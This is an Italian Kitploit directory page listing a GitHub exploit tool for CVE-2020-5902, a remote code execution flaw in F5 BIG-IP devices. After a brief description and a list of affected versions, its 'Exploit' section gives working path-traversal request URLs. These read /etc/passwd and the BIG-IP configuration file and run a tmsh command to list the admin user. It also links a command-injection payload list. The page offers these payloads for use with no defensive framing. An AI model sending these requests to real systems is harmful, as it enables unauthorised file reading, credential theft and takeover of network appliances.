Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/jsec1337/rce-cve-2020-5902
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubjsec1337/rce-cve-2020-5902

RCE-CVE-2020-5902

BIG-IP F5 Esecuzione remota di codice

Vedi Repository
116 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RCE-CVE-2020-5902

BIG-IP F5 Esecuzione di codice remoto

Descrizione

Questi attacchi hanno come bersaglio BIG-IP, un dispositivo di rete multiuso prodotto da F5 Networks. I dispositivi BIG-IP possono essere configurati per funzionare come sistemi di traffic shaping, bilanciatori di carico, firewall, gateway di accesso, limitatori di velocità o middleware SSL.

Mercoledì F5 Networks ha pubblicato delle patch e ha rilasciato un advisory di sicurezza riguardante una vulnerabilità di "esecuzione di codice remoto" nei dispositivi BIG-IP.

F5 ha dichiarato che la vulnerabilità, tracciata come CVE-2020-5902, potrebbe consentire agli aggressori di assumere il pieno controllo dei sistemi non patchati accessibili su internet.

Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability             : Remote Code Execution (RCE) 
Score CVE                 : 10/10

Exploit

https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Verifica NMAP

Payload RCE

https://github.com/payloadbox/command-injection-payload-list

Riferimenti

https://twitter.com/Nep_1337_1998/status/1279610946864820225

https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/

Scarica lo strumento